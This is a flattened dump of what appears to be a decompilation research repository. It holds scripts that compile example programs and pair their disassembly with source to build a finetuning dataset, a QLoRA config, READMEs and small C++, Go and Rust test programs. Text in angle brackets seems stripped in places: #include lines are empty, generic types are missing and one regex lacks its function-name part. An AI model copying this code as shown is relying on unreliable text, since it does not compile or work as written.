v.push('-'); 43 | } 44 | 45 | i = (i - 1) / 2; 46 | } 47 | 48 | for c in v.iter().rev() { 49 | result.push(*c); 50 | } 51 | } 52 | } 53 | } 54 | 55 | return result; 56 | } -------------------------------------------------------------------------------- /eval/rust_corpus/source/parasite_deco_2021.rs: -------------------------------------------------------------------------------- 1 | use std::char; 2 | use std::io; 3 | 4 | use std::collections::HashMap; 5 | use std::iter::Peekable; 6 | 7 | // Encodes and decodes SKATS Hangul. 8 | // https://en.wikipedia.org/wiki/SKATS 9 | // https://en.wikipedia.org/wiki/Korean_language_and_computers#Hangul_Syllables_block 10 | 11 | // Codes for Initial, Medial, and Final jamo. 
12 | const I: &'static str = "L?LL?F?B?BB?V?M?W?WW?G?GG?K?P?PP?C?X?Z?O?J"; 13 | const M: &'static str = "E?EU?I?IU?T?TU?S?SU?A?AE?AEU?AU?N?H?HT?HTU?HU?R?D?DU?U"; 14 | const F: &'static str = "?L?LL?LG?F?FP?FJ?B?V?VL?VM?VW?VG?VZ?VO?VJ?M?W?WG?G?GG?K?P?C?X?Z?O?J"; 15 | 16 | fn deco(input: &str) -> String { 17 | let imap: HashMap<&str, usize> = I.split("?").enumerate().map(|(i, v)| (v, i)).collect(); 18 | let mmap: HashMap<&str, usize> = M.split("?").enumerate().map(|(i, v)| (v, i)).collect(); 19 | let fmap: HashMap<&str, usize> = F.split("?").enumerate().map(|(i, v)| (v, i)).collect(); 20 | 21 | let mut result = String::new(); 22 | let uppercase = input.to_ascii_uppercase(); 23 | let mut iter = uppercase.chars().peekable(); 24 | 25 | while iter.peek().is_some() { 26 | let ti = read(&imap, iter.by_ref()); 27 | let tm = read(&mmap, iter.by_ref()); 28 | let tf = read(&fmap, iter.by_ref()); 29 | 30 | match (ti, tm) { 31 | (Some(xi), Some(xm)) => { 32 | let n = 588 * xi + 28 * xm + tf.unwrap_or(0) + 44032; 33 | let c = std::char::from_u32(n as u32); 34 | result.push(c.unwrap()); 35 | } 36 | _ => {} 37 | } 38 | 39 | let _ = iter.by_ref().take_while(|c| *c != ' '); 40 | iter.next(); 41 | 42 | if iter.peek() == Some(&' ') { 43 | result.push(' '); 44 | iter.next(); 45 | } 46 | } 47 | 48 | return result; 49 | } -------------------------------------------------------------------------------- /finetune/README.md: -------------------------------------------------------------------------------- 1 | # Decompilation Dataset Extraction/Finetuning Tools 2 | This folder contains all the code to create the decompilation dataset and finetune a large language model using that data. 3 | ## Dataset 4 | The current version of the dataset can be found here: [Decomp Dataset](https://huggingface.co/datasets/ap0009/decomp_dataset). 
## Finetuning
You can finetune a model using this dataset with the following commands:
```bash
wget https://huggingface.co/datasets/ap0009/decomp_dataset/resolve/main/decomp_dataset.json
pip3 install axolotl
accelerate launch -m axolotl.cli.train deepseek.yml
```
After a couple of hours of training, you should get a ./qlora-out folder (the output_dir set in deepseek.yml) containing the finetuned model.
## extract_*.py
extract_c.py, extract_cpp.py, extract_go.py, and extract_rust.py are standalone scripts that use the files in the data folder to extract disassembly and source pairings, which are then stored in an output folder.
The scripts can be run as follows, replacing * with the language you want to process (c, cpp, go, or rust):
```bash
python3 extract_*.py
```
Please make sure the compiler for each language is installed (C: clang, CPP: clang++, Go: go, Rust: rustc), that objdump is available for disassembling the compiled binaries, and that all the data is cloned into the right location in the data subfolder.
To create your own custom dataset, you can modify the compiler flags used or the data in the data subfolder.
## merge.py
This utility script combines all the JSON output files from the extraction tools into a single JSON file. Invoke it by running the file with Python; it reads the *_prompts folders under ./output and writes ./merged.json.
## data subfolder
The data subfolder contains README files that explain how to collect all the data for the original dataset. All the data sources should be put into this folder for the extraction tools to work properly.
## deepseek.yml
This file contains the configuration used to finetune deepseek-coder-6.7b-instruct with the decompilation data. This configuration can be modified to customize finetuning.
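Before launching a finetuning run, it can help to confirm that every record in the dataset file is a usable pair. The sketch below is not part of the repository; it only assumes what the extraction scripts show, namely that each record is a JSON object with an `instruction` and an `output` string. The function names are hypothetical.

```python
import json

# Keys written by the extract_*.py scripts for every prompt file.
REQUIRED_KEYS = ("instruction", "output")


def find_bad_records(records):
    """Return the indices of records that are not usable instruction/output pairs."""
    bad = []
    for index, record in enumerate(records):
        ok = isinstance(record, dict) and all(
            isinstance(record.get(key), str) and record[key].strip()
            for key in REQUIRED_KEYS
        )
        if not ok:
            bad.append(index)
    return bad


def check_dataset(path):
    """Load a merged dataset file and return (record count, bad record indices)."""
    with open(path, encoding="utf-8") as handle:
        records = json.load(handle)
    return len(records), find_bad_records(records)
```

Calling `check_dataset("./decomp_dataset.json")` returns the number of records and the indices that should be inspected or dropped, for example records whose `output` was written as `null` because no source was found for the function.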

--------------------------------------------------------------------------------
/finetune/data/README.md:
--------------------------------------------------------------------------------
## Data Folder
This folder contains all the data used by the extraction tools to construct the decompilation dataset.
For the current dataset, there need to be three data sources in this folder.
## Data sources
1. c-by-example.md
You need to download the file from [here](https://raw.githubusercontent.com/seanvaleo/cbyexample.com/master/README.md) and rename it to c-by-example.md.
2. cppreference folder
You need to download the zip file from [here](https://github.com/PeterFeicht/cppreference-doc/releases/download/v20230810/html-book-20230810.zip) and unzip it to a directory named cppreference.
3. rust-by-example folder
You need to clone the [rust-by-example repository](https://github.com/rust-lang/rust-by-example/tree/master) to this folder.
## *_corpus subfolders
These subfolders contain example programs taken from various data sources. There is more information about the data sources in the README of each subfolder.

--------------------------------------------------------------------------------
/finetune/data/c_corpus/README.md:
--------------------------------------------------------------------------------
# c_corpus folder
This folder contains many example C programs which are used in the current decompilation dataset.
There are three data sources in the current folder.
## Sources
1. https://github.com/examplehub/C
2. https://github.com/DarrenRainey/C-Examples
3. https://github.com/gouravthakur39/beginners-C-program-examples

Clone these repositories in this folder for the extraction tools to collect the current dataset.
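Since extract_c.py walks ./data/c_corpus/ and picks up every file ending in .c, a quick count per cloned repository shows whether the clones landed where the script looks. This is a minimal sketch, not a script from the repository; `count_sources` is a hypothetical helper name.

```python
import os
from collections import Counter


def count_sources(corpus_dir, suffix):
    """Count files ending in `suffix` under each top-level entry of corpus_dir.

    Files that sit directly in corpus_dir are reported under the key ".".
    """
    counts = Counter()
    for root, _dirs, files in os.walk(corpus_dir):
        relative = os.path.relpath(root, corpus_dir)
        top_level = relative.split(os.sep)[0]
        for filename in files:
            if filename.endswith(suffix):
                counts[top_level] += 1
    return dict(counts)
```

For example, `count_sources("./data/c_corpus", ".c")` should list one key per cloned repository; a repository missing from the result contributed no .c files to the dataset.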
9 | -------------------------------------------------------------------------------- /finetune/data/cpp_corpus/README.md: -------------------------------------------------------------------------------- 1 | # cpp_corpus folder 2 | This folder contains many example CPP programs which are used in the current decompilation dataset. 3 | There are five data sources in the current folder. 4 | ## Sources 5 | 1. https://github.com/tridibsamanta/CPP_Beginner_to_Expert 6 | 2. https://github.com/sinairv/Cpp-Tutorial-Samples 7 | 3. https://github.com/theWhiteWulfy/legacy_cplusplus 8 | 4. https://github.com/yuchdev/cpp 9 | 5. https://github.com/mrtkp9993/Cpp-Examples 10 | Clone these repositories in this folder for the extraction tools to collect the current dataset. 11 | -------------------------------------------------------------------------------- /finetune/data/go_corpus/README.md: -------------------------------------------------------------------------------- 1 | # go_corpus folder 2 | This folder contains many example Go programs which are used in the current decompilation dataset. 3 | There are four data sources in the current folder. 4 | ## Sources 5 | 1. https://github.com/mmcgrana/gobyexample 6 | 2. https://github.com/nathany/get-programming-with-go 7 | 3. https://github.com/inancgumus/learngo 8 | 4. https://github.com/callicoder/golang-tutorials 9 | Clone these repositories in this folder for the extraction tools to collect the current dataset. 10 | -------------------------------------------------------------------------------- /finetune/data/rust_corpus/README.md: -------------------------------------------------------------------------------- 1 | # rust_corpus folder 2 | This folder contains many example Rust programs which are used in the current decompilation dataset. 3 | There are three data sources in the current folder. 4 | ## Sources 5 | 1. https://github.com/rust-lang/book 6 | 2. https://github.com/eliovir/rust-examples 7 | 3. 
https://github.com/ProgrammingRust/examples

Clone these repositories in this folder for the extraction tools to collect the current dataset.

--------------------------------------------------------------------------------
/finetune/deepseek.yml:
--------------------------------------------------------------------------------
# This is the finetuning configuration file for deepseek.
base_model: deepseek-ai/deepseek-coder-6.7b-instruct
model_type: AutoModelForCausalLM
tokenizer_type: AutoTokenizer
is_llama_derived_model: true

load_in_8bit: false
load_in_4bit: true
strict: false

datasets:
  - path: ./decomp_dataset.json
    type: alpaca
dataset_prepared_path:
val_set_size: 0.05
output_dir: ./qlora-out

adapter: qlora
lora_model_dir:

sequence_len: 4096
sample_packing: true
pad_to_sequence_len: true

lora_modules_to_save:
  - embed_tokens
  - lm_head

lora_r: 32
lora_alpha: 16
lora_dropout: 0.05
lora_target_modules:
lora_target_linear: true
lora_fan_in_fan_out:

wandb_project:
wandb_entity:
wandb_watch:
wandb_name:
wandb_log_model:

gradient_accumulation_steps: 2
micro_batch_size: 2
num_epochs: 3
optimizer: adamw_bnb_8bit
lr_scheduler: cosine
learning_rate: 0.0002

train_on_inputs: false
group_by_length: false
bf16: true
fp16: false
tf32: false

gradient_checkpointing: true
early_stopping_patience:
resume_from_checkpoint:
local_rank:
logging_steps: 1
xformers_attention:
flash_attention: true

warmup_steps: 10
evals_per_epoch: 4
saves_per_epoch: 2
debug:
weight_decay: 0.0
fsdp:
fsdp_config:
special_tokens:
  bos_token: ""
  eos_token: ""
  unk_token: ""

--------------------------------------------------------------------------------
/finetune/extract_c.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | from bs4 import BeautifulSoup 4 | import subprocess 5 | import json 6 | from tree_sitter import Language, Parser 7 | from tree_sitter_languages import get_language, get_parser 8 | 9 | language = get_language('c') 10 | parser = get_parser('c') 11 | 12 | GENERATE = True 13 | 14 | def run_command(command): 15 | process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 16 | output, error = process.communicate() 17 | exit_code = process.wait() 18 | 19 | output, error = output.decode("utf-8"), error.decode("utf-8") 20 | return exit_code, output, error 21 | 22 | def traverse_tree(tree): 23 | func_sources = {} 24 | cursor = tree.walk() 25 | 26 | reached_root = False 27 | while reached_root == False: 28 | if cursor.node.type == "function_definition": 29 | queue = [cursor.node.child_by_field_name("declarator")] 30 | while queue: 31 | node = queue.pop(0) 32 | if node.type == 'function_declarator': 33 | func_sources[node.child_by_field_name("declarator").text.decode('utf8')] = cursor.node.text.decode('utf8') 34 | break 35 | else: 36 | queue.extend(node.children) 37 | 38 | if cursor.goto_first_child(): 39 | continue 40 | 41 | if cursor.goto_next_sibling(): 42 | continue 43 | 44 | retracing = True 45 | while retracing: 46 | if not cursor.goto_parent(): 47 | retracing = False 48 | reached_root = True 49 | 50 | if cursor.goto_next_sibling(): 51 | retracing = False 52 | return func_sources 53 | 54 | if GENERATE: 55 | f = open('./data/c-by-example.md') 56 | text = f.read() 57 | f.close() 58 | 59 | c_blocks = [] 60 | blocks = re.findall(r'(\'\'\'|```)c\S*\s([\s\S]*?)(\'\'\'|```)', text, re.S) 61 | for block in blocks: 62 | c_blocks.append(block[1]) 63 | 64 | for root, dirs, files in os.walk("./data/cppreference"): 65 | for filename in files: 66 | if filename.endswith(".html"): 67 | filepath = os.path.join(root, 
filename) 68 | with open(filepath) as f: 69 | contents = f.read() 70 | f.close() 71 | soup = BeautifulSoup(contents, 'html.parser') 72 | source_c_div = soup.find_all('div', class_='source-c') 73 | for div in source_c_div: 74 | extracted_text = div.get_text() 75 | c_blocks.append(extracted_text) 76 | 77 | for root, dirs, files in os.walk("./data/c_corpus/"): 78 | for filename in files: 79 | if filename.endswith(".c"): 80 | filepath = os.path.join(root, filename) 81 | with open(filepath) as f: 82 | contents = f.read() 83 | f.close() 84 | c_blocks.append(contents) 85 | 86 | c_blocks = list(set(c_blocks)) 87 | print(len(c_blocks)) 88 | 89 | if not os.path.exists("./output"): 90 | os.mkdir("./output") 91 | 92 | if not os.path.exists("./output/c_binaries"): 93 | os.mkdir("./output/c_binaries") 94 | 95 | if not os.path.exists("./output/c_prompts"): 96 | os.mkdir("./output/c_prompts") 97 | 98 | count = 0 99 | 100 | for i in range(len(c_blocks)): 101 | tree = parser.parse(bytes(c_blocks[i], "utf8")) 102 | func_sources = traverse_tree(tree) 103 | 104 | if len(func_sources) > 0: 105 | f = open(os.path.join("./output", f"temp.c"), "w") 106 | f.write(c_blocks[i]) 107 | f.close() 108 | 109 | commands = [(f'clang -g -O0 ./output/temp.c -o ./output/c_binaries/c_{i}_debug_no.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_debug_no.out'), 110 | (f'clang -g -O1 ./output/temp.c -o ./output/c_binaries/c_{i}_debug_one.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_debug_one.out'), 111 | (f'clang -g -O2 ./output/temp.c -o ./output/c_binaries/c_{i}_debug_two.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_debug_two.out'), 112 | (f'clang -g -O3 ./output/temp.c -o ./output/c_binaries/c_{i}_debug_three.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_debug_three.out'), 113 | (f'clang -O0 ./output/temp.c -o ./output/c_binaries/c_{i}_no_debug_no.out', f'objdump -d -C -s --no-show-raw-insn 
./output/c_binaries/c_{i}_no_debug_no.out'), 114 | (f'clang -O1 ./output/temp.c -o ./output/c_binaries/c_{i}_no_debug_one.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_no_debug_one.out'), 115 | (f'clang -O2 ./output/temp.c -o ./output/c_binaries/c_{i}_no_debug_two.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_no_debug_two.out'), 116 | (f'clang -O3 ./output/temp.c -o ./output/c_binaries/c_{i}_no_debug_three.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_no_debug_three.out') 117 | ] 118 | 119 | for command, objdump_command in commands: 120 | exit_code, output, error = run_command(command) 121 | if exit_code != 0: 122 | continue 123 | else: 124 | exit_code, output, error = run_command(objdump_command) 125 | if exit_code == 0: 126 | for func in func_sources: 127 | pattern = re.compile(rf"<{func}>:\n(([^\n]+\n)*)") 128 | match = re.search(pattern, output) 129 | if match: 130 | filename = objdump_command.split(' ')[-1].split('/')[-1] 131 | disasm = re.sub(r'\s[0-9abcdef]+:\s', '', match.group(1)) 132 | f = open(os.path.join('./output/c_prompts', filename + "_" + str(count) + ".json"), "w") 133 | if count % 2 == 0: 134 | json_payload = { 135 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nGenerate just the C code for the function that produced the above x86 64-bit assembly. The C code is idiomatic and uses functions, types, and structures from standard libraries.", 136 | "output": func_sources.get(func) 137 | } 138 | else: 139 | json_payload = { 140 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nDecompile the above x86 64-bit assembly into C code. 
The C code is idiomatic and uses functions, types, and structures from standard libraries.", 141 | "output": func_sources.get(func) 142 | } 143 | json.dump(json_payload, f) 144 | f.close() 145 | count += 1 146 | else: 147 | print(f"Error in objdump: {error}") 148 | -------------------------------------------------------------------------------- /finetune/extract_go.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | from bs4 import BeautifulSoup 4 | import subprocess 5 | import json 6 | from tree_sitter import Language, Parser 7 | from tree_sitter_languages import get_language, get_parser 8 | from tqdm import tqdm 9 | 10 | language = get_language('go') 11 | parser = get_parser('go') 12 | 13 | GENERATE = True 14 | 15 | def run_command(command): 16 | process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 17 | output, error = process.communicate() 18 | exit_code = process.wait() 19 | 20 | output, error = output.decode("utf-8"), error.decode("utf-8") 21 | return exit_code, output, error 22 | 23 | def traverse_tree(tree): 24 | func_sources = {} 25 | def find_functions(node): 26 | node_type = node.type 27 | children = node.children 28 | 29 | if node_type in {'function_declaration', 'method_declaration'}: 30 | if node.child_by_field_name('name'): 31 | name = node.child_by_field_name('name').text.decode('utf8') 32 | func_sources[name] = node.text.decode('utf8') 33 | else: 34 | for child in children: 35 | find_functions(child) 36 | 37 | find_functions(tree.root_node) 38 | return func_sources 39 | 40 | if GENERATE: 41 | go_blocks = [] 42 | for root, dirs, files in os.walk("./data/go_corpus/"): 43 | for filename in files: 44 | if filename.endswith(".go"): 45 | filepath = os.path.join(root, filename) 46 | try: 47 | with open(filepath) as f: 48 | contents = f.read() 49 | f.close() 50 | go_blocks.append(contents) 51 | except: 52 | continue 53 | 54 | go_blocks = 
list(set(go_blocks)) 55 | print(len(go_blocks)) 56 | 57 | if not os.path.exists("./output"): 58 | os.mkdir("./output") 59 | 60 | if not os.path.exists("./output/go_binaries"): 61 | os.mkdir("./output/go_binaries") 62 | 63 | if not os.path.exists("./output/go_prompts"): 64 | os.mkdir("./output/go_prompts") 65 | 66 | count = 0 67 | 68 | for i in tqdm(range(len(go_blocks))): 69 | tree = parser.parse(bytes(go_blocks[i], "utf8")) 70 | func_sources = traverse_tree(tree) 71 | 72 | if len(func_sources) > 0: 73 | f = open(os.path.join("./output", f"temp.go"), "w") 74 | f.write(go_blocks[i]) 75 | f.close() 76 | 77 | commands = [(f'go build -o ./output/go_binaries/go_{i}.out ./output/temp.go', f'objdump -d -C --no-show-raw-insn ./output/go_binaries/go_{i}.out')] 78 | 79 | for command, objdump_command in commands: 80 | exit_code, output, error = run_command(command) 81 | if exit_code != 0: 82 | continue 83 | else: 84 | exit_code, output, error = run_command(objdump_command) 85 | if exit_code == 0: 86 | for func in func_sources: 87 | pattern = re.compile(rf":\n(([^\n]+\n)*)") 88 | match = re.search(pattern, output) 89 | if match: 90 | filename = objdump_command.split(' ')[-1].split('/')[-1] 91 | disasm = re.sub(r'\s[0-9abcdef]+:\s', '', match.group(2)) 92 | f = open(os.path.join('./output/go_prompts', filename + "_" + str(count) + ".json"), "w") 93 | if count % 2 == 0: 94 | json_payload = { 95 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nGenerate just the Go code for the function that produced the above x86 64-bit assembly. The Go code is idiomatic and uses standard libraries and channels.", 96 | "output": func_sources.get(func) 97 | } 98 | else: 99 | json_payload = { 100 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nDecompile the above x86 64-bit assembly into Go code. 
The Go code is idiomatic and uses standard libraries and channels.", 101 | "output": func_sources.get(func) 102 | } 103 | json.dump(json_payload, f) 104 | f.close() 105 | else: 106 | try: 107 | pattern = re.compile(rf":\n(([^\n]+\n)*)") 108 | match = re.search(pattern, output) 109 | except: 110 | continue 111 | if match: 112 | filename = objdump_command.split(' ')[-1].split('/')[-1] 113 | disasm = re.sub(r'\s[0-9abcdef]+:\s', '', match.group(1)) 114 | f = open(os.path.join('./output/go_prompts', filename + "_" + str(count) + ".json"), "w") 115 | if count % 2 == 0: 116 | json_payload = { 117 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nGenerate just the Go code for the function that produced the above x86 64-bit assembly. The Go code is idiomatic and uses standard libraries and channels.", 118 | "output": func_sources.get(func) 119 | } 120 | else: 121 | json_payload = { 122 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nDecompile the above x86 64-bit assembly into Go code. The Go code is idiomatic and uses standard libraries and channels.", 123 | "output": func_sources.get(func) 124 | } 125 | json.dump(json_payload, f) 126 | f.close() 127 | count += 1 128 | else: 129 | print(f"Error in objdump: {error}") 130 | -------------------------------------------------------------------------------- /finetune/merge.py: -------------------------------------------------------------------------------- 1 | import os 2 | import json 3 | 4 | # This script allows you to merge many json files into one singular json file. 
def merge_json_files(dirs, output_file):
    json_objects = []

    for input_dir in dirs:
        # Skip prompt folders that were never generated instead of crashing in os.listdir.
        if not os.path.isdir(input_dir):
            print(f"Skipping missing directory: {input_dir}")
            continue

        for filename in os.listdir(input_dir):
            if filename.endswith(".json"):
                file_path = os.path.join(input_dir, filename)

                with open(file_path, 'r') as file:
                    json_object = json.load(file)

                json_objects.append(json_object)

    # Use a separate name for the file handle so the output_file path is not shadowed.
    with open(output_file, 'w') as out:
        json.dump(json_objects, out, indent=2)

if __name__ == "__main__":
    input_directory = ["./output/c_prompts", "./output/cpp_prompts", './output/go_prompts', './output/rust_prompts']

    output_file = "./merged.json"

    merge_json_files(input_directory, output_file)

    print(f"Merged JSON file saved to: {output_file}")

--------------------------------------------------------------------------------
/split/README.md:
--------------------------------------------------------------------------------
# Decompilation Splitting Demo
This folder contains all the code for the demo of splitting the disassembly of a large function into chunks and then decompiling each chunk.
The technique used to split the disassembly in this demo is label splitting, where the disassembly is divided into sections at the branch labels it contains.
## function_split.py
This file contains the main code for the demo. It can be run using the following command:
```bash
python3 function_split.py
```
The demo will then run.
Note that this can take a long time, depending on the number of sections.
The generate_llm_response function in this file can be modified to work with any LLM.
For this demo, the data used is from the rumrum binary from the 2021 Decompetition challenge. A few variables in the file can be changed to make it work with any program.
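To make the label splitting idea concrete, here is a minimal sketch. It is not the code from function_split.py; it assumes Ghidra-style branch labels of the form `LAB_<hex address>:` on their own line, as they appear in the disassembly files of the eval corpus. The function name and the `entry` section name are hypothetical.

```python
import re

# A branch label on its own line, e.g. "LAB_0010eb16:".
LABEL_RE = re.compile(r"^\s*(LAB_[0-9A-Fa-f]+):\s*$")


def split_by_labels(disassembly):
    """Split disassembly text into (label, instructions) sections at branch labels.

    Instructions before the first label are grouped under "entry".
    A label that is immediately followed by another label has no
    instructions of its own and is dropped.
    """
    sections = []
    current_label = "entry"
    current_lines = []
    for line in disassembly.splitlines():
        match = LABEL_RE.match(line)
        if match:
            # A new label closes the section collected so far.
            if current_lines:
                sections.append((current_label, current_lines))
            current_label = match.group(1)
            current_lines = []
        elif line.strip():
            current_lines.append(line.strip())
    if current_lines:
        sections.append((current_label, current_lines))
    return sections
```

Each returned section can then be sent to the LLM on its own, which keeps every request small at the cost of one request per section.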
13 | # Video of Demo 14 | Here is a link to a video demonstrating the decompilation splitting technique: 15 | [Video #1](https://drive.google.com/file/d/1tNZp2ygdOU-gBVgfqtBYXy7GI8m5hld2/view?usp=sharing) 16 | -------------------------------------------------------------------------------- /tests/README.md: -------------------------------------------------------------------------------- 1 | # Testfiles 2 | This repository contains test binaries and their source code. These binaries can be fed into Ghidra and the plugin to test the accuracy of the plugin. The binaries are from several different languages including, c++, go, and rust. They also implement different features of the languages. All the binaries were compiled on x64 Ubuntu 20.04. 3 | -------------------------------------------------------------------------------- /tests/graph: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/graph -------------------------------------------------------------------------------- /tests/graph.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | class Node { 6 | public: 7 | int data; 8 | std::vector neighbors; 9 | bool visited = false; 10 | 11 | Node(int data) { 12 | this->data = data; 13 | } 14 | }; 15 | 16 | std::map graph; 17 | 18 | // Function to add an edge to the graph 19 | void addEdge(int source, int destination) { 20 | Node* src = graph[source]; 21 | Node* dest = graph[destination]; 22 | src->neighbors.push_back(dest); 23 | } 24 | 25 | // Recursive function to perform depth-first traversal 26 | void DFS(Node* node) { 27 | std::cout << node->data << " "; 28 | node->visited = true; 29 | 30 | for (auto neighbor : node->neighbors) { 31 | if (!neighbor->visited) { 32 | DFS(neighbor); 33 | } 34 | } 35 | } 36 | 37 | int main() { 38 | // Create nodes 39 | 
for (int i = 1; i <= 7; i++) { 40 | graph[i] = new Node(i); 41 | } 42 | 43 | // Add edges 44 | addEdge(1, 2); 45 | addEdge(1, 3); 46 | addEdge(2, 4); 47 | addEdge(2, 5); 48 | addEdge(3, 6); 49 | addEdge(3, 7); 50 | 51 | // Perform depth-first traversal 52 | std::cout << "DFS Traversal: "; 53 | DFS(graph[1]); 54 | std::cout << std::endl; 55 | 56 | return 0; 57 | } 58 | -------------------------------------------------------------------------------- /tests/http: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/http -------------------------------------------------------------------------------- /tests/http.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | func main() { 9 | http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { 10 | http.ServeFile(w, r, "./files"+r.URL.Path) 11 | }) 12 | 13 | fmt.Println("Server is listening...") 14 | http.ListenAndServe(":8000", nil) 15 | } 16 | -------------------------------------------------------------------------------- /tests/lambda: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/lambda -------------------------------------------------------------------------------- /tests/lambda.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | using namespace std; 3 | 4 | int main() 5 | { 6 | vector v1 = {1, 2, 3, 4, 5, 6}; 7 | 8 | [v1]() 9 | { 10 | for (auto p = v1.begin(); p != v1.end(); p++) 11 | { 12 | cout << *p << " "; 13 | } 14 | }; 15 | } 16 | -------------------------------------------------------------------------------- /tests/linked: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/linked -------------------------------------------------------------------------------- /tests/linked.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | struct Node { 4 | int data; 5 | Node* next; 6 | }; 7 | 8 | Node* head = NULL; 9 | 10 | // Function to insert a new node at the front of the list 11 | void push(int new_data) { 12 | Node* new_node = new Node(); 13 | new_node->data = new_data; 14 | new_node->next = head; 15 | head = new_node; 16 | } 17 | 18 | // Function to reverse the linked list 19 | void reverse() { 20 | Node* current = head; 21 | Node* prev = NULL; 22 | Node* next = NULL; 23 | 24 | while (current != NULL) { 25 | next = current->next; 26 | current->next = prev; 27 | prev = current; 28 | current = next; 29 | } 30 | 31 | head = prev; 32 | } 33 | 34 | // Function to print the linked list 35 | void printList() { 36 | Node* temp = head; 37 | while (temp != NULL) { 38 | std::cout << temp->data << " "; 39 | temp = temp->next; 40 | } 41 | std::cout << std::endl; 42 | } 43 | 44 | int main() { 45 | push(5); 46 | push(4); 47 | push(3); 48 | push(2); 49 | push(1); 50 | 51 | std::cout << "Original List: "; 52 | printList(); 53 | 54 | reverse(); 55 | 56 | std::cout << "Reversed List: "; 57 | printList(); 58 | 59 | return 0; 60 | } 61 | -------------------------------------------------------------------------------- /tests/map: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/map -------------------------------------------------------------------------------- /tests/map.rs: -------------------------------------------------------------------------------- 1 | use 
std::collections::HashMap; 2 | 3 | fn main() { 4 | let mut map = HashMap::new(); 5 | map.insert("a", 1); 6 | map.insert("b", 2); 7 | map.insert("c", 3); 8 | 9 | for (key, value) in &map { 10 | println!("{}: {}", key, value); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /tests/multi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/multi -------------------------------------------------------------------------------- /tests/multi.rs: -------------------------------------------------------------------------------- 1 | use std::sync::{Mutex, Arc}; 2 | use std::thread; 3 | 4 | fn main() { 5 | let numbers = Arc::new(Mutex::new(vec![1, 2, 3, 4, 5])); 6 | let mut threads = vec![]; 7 | 8 | for i in 0..5 { 9 | let numbers = numbers.clone(); 10 | threads.push(thread::spawn(move || { 11 | let mut numbers = numbers.lock().unwrap(); 12 | println!("Thread {}: {}", i, numbers[i]); 13 | })); 14 | } 15 | 16 | for thread in threads { 17 | thread.join().unwrap(); 18 | } 19 | } 20 | --------------------------------------------------------------------------------